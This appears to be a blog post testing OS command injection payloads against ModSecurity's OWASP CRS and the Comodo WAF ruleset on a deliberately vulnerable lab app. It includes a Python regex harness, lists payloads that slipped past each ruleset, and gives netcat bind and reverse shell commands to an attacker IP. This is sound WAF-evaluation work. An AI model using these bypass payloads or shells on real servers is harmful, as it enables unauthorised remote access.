In this blog post, we test OS command injection payloads against a vulnerable application protected by ModSecurity running the OWASP Core Rule Set (CRS) and the Comodo WAF (CWAF) ruleset.
How do we identify flaws in the OWASP CRS and CWAF rulesets?
- First, set up a vulnerable application such as XVWA or OWASP Mutillidae on the test server.
- Install ModSecurity and include both the OWASP CRS and the CWAF ruleset in the Apache config.
- Before testing the vulnerable app, get a clear understanding of the OWASP Top 10 vulnerabilities:
- How does each one work?
- How is it exploited?
- Which modern evasion techniques are used to bypass WAF rules, and how do they work?
- Read the ModSecurity Reference Manual on GitHub and understand how ModSecurity processes a request (phases, transformation functions, operators).
- Start analysing the rules.
- Break each regex down and work out how it was developed.
- Test the regex pattern against payloads to see how accurately it detects them.
- Start testing the vulnerable app.
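The "break the regex and test it against payloads" step is easiest to do offline, before touching Apache. The harness below is an added example written for this post (it is not code from the post, the OWASP CRS or the CWAF ruleset). It imitates the way ModSecurity evaluates a rule: the argument value is run through the rule's transformation chain and the result is matched against the operator regex. CANDIDATE_REGEX, the transformation approximations and the extra evasion payloads are assumptions made for the example; to analyse a real rule, paste its @rx pattern and its t: chain in their place.

```python
"""Regex harness for analysing a ModSecurity command-injection rule.

Added example for this post; not code from the post, the OWASP CRS or the
CWAF ruleset. CANDIDATE_REGEX is a pattern written for this example (an
assumption, not the CRS/CWAF regex); the t_* functions are simplified
approximations of the documented ModSecurity transformations.
"""
import re
import urllib.parse

# Payloads taken from the post (detection expected: True), constructed
# evasion variants (True) and two benign values (False).
PAYLOADS = {
    "127.0.0.1 && cd /root/Desktop/ && pwd && service --status-all": True,
    "127.0.0.1 && ps": True,
    "127.0.0.1 && service mysql status": True,
    "127.0.0.1 && nc -c /bin/sh 192.168.1.12 9999": True,
    "127.0.0.1 ; uname -a": True,                   # constructed: ';' separator
    "127.0.0.1 | netstat -ltnp": True,              # constructed: pipe
    "127.0.0.1%20%26%26%20whoami": True,            # constructed: URL-encoded '&&'
    "127.0.0.1 && w'h'o'a'm'i": True,               # constructed: quote splitting
    "127.0.0.1 && u\\name -a": True,                # constructed: backslash insertion
    "127.0.0.1": False,
    "example.com": False,
}

# Example operator pattern: a known command name delimited by start-of-input,
# whitespace or a shell metacharacter. Command names, not separators, are the
# anchor, because t:cmdLine (below) turns ';' into a space before matching.
CANDIDATE_REGEX = re.compile(
    r"(?:^|[\s&|;`$(])"
    r"(?:ps|pwd|cd|uname|whoami|id|ls|cat|nc|netcat|netstat|service|echo)"
    r"(?:\s|$)"
)


def t_url_decode_uni(value: str) -> str:
    """Approximation of t:urlDecodeUni (%XX only; %uXXXX is not handled)."""
    return urllib.parse.unquote(value)


def t_cmd_line(value: str) -> str:
    """Approximation of t:cmdLine as documented in the ModSecurity manual:
    delete \\ " ' ^, turn ',' and ';' into spaces, collapse whitespace,
    drop whitespace before '/' and '(', lowercase."""
    value = re.sub(r"[\\\"'^]", "", value)
    value = re.sub(r"[,;]", " ", value)
    value = re.sub(r"\s+", " ", value)
    value = re.sub(r"\s+(?=[/(])", "", value)
    return value.lower()


TRANSFORMS = {
    "urlDecodeUni": t_url_decode_uni,
    "cmdLine": t_cmd_line,
    "lowercase": str.lower,
}
DEFAULT_CHAIN = ("urlDecodeUni", "cmdLine", "lowercase")


def evaluate(payload: str, chain=DEFAULT_CHAIN) -> bool:
    """Apply the transformation chain in order, then run the operator regex."""
    value = payload
    for name in chain:
        value = TRANSFORMS[name](value)
    return CANDIDATE_REGEX.search(value) is not None


def misses(chain=DEFAULT_CHAIN):
    """Payloads whose verdict differs from expectation (false negatives and false positives)."""
    return [p for p, expected in PAYLOADS.items() if evaluate(p, chain) != expected]


if __name__ == "__main__":
    for chain in (DEFAULT_CHAIN, ("urlDecodeUni", "lowercase"), ("cmdLine",)):
        print(f"chain {chain}: {len(misses(chain))} misses -> {misses(chain)}")
```

Running it with different chains shows why a rule has to be read together with its transformations: without cmdLine the quote-split and backslash variants slip past the same regex, and without urlDecodeUni the percent-encoded separator does. When auditing a real CRS or CWAF rule, reproduce its exact t: list here before judging the regex.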
How do we test OS command injection on a vulnerable application with the OWASP CRS and CWAF rulesets?
- Install ModSecurity and configure the OWASP CRS and the CWAF ruleset.
- Install the XVWA app and configure its database.
- Start testing the XVWA app for OS command injection.
Test scenarios
1. Testing OS command injection against the OWASP CRS
Info: the shell separators &&, ; and | let us chain or pipe additional commands onto the injected value.
Include the OWASP CRS in the Apache config and test the following payloads on the XVWA application's OS command injection page.
127.0.0.1 && cd /root/Desktop/ && pwd && service --status-all
127.0.0.1 && ps
127.0.0.1 && service mysql status
127.0.0.1 && service apache2 status
As a result, the OWASP CRS failed to detect the four payloads above, although it blocked almost every other common OS command injection payload we tried. Detection coverage depends on the CRS version and paranoia level in use, which are not recorded here, so re-test under your own settings. Check the demo video for details.
2. Testing OS command injection against the CWAF ruleset
Switch the Apache config to the CWAF ruleset and, using the same command separators as above, test the following payloads on the XVWA application.
127.0.0.1 && cd /root/Desktop/ && pwd && ps && service --status-all
127.0.0.1 && cat index.php
127.0.0.1 && echo "tell me whoami? I am Human or AI :)"
127.0.0.1 && nc -ln -e /bin/sh -p 9999
127.0.0.1 && uname -a
127.0.0.1 && netstat -ltnp | grep '80'
Let's try a reverse shell with the following payload:
Payload:
127.0.0.1 && nc -c /bin/sh 192.168.1.12 9999
Attacker IP: 192.168.1.12
Attacker listener port: 9999
Note that -c (run a command after connecting) exists in ncat and netcat-traditional but not in the OpenBSD netcat that many distributions ship by default, so the target's netcat variant decides whether this payload works.
As a result, CWAF failed to detect these major OS command injection payloads, which let us obtain a reverse shell on the server. Check the demo video for details.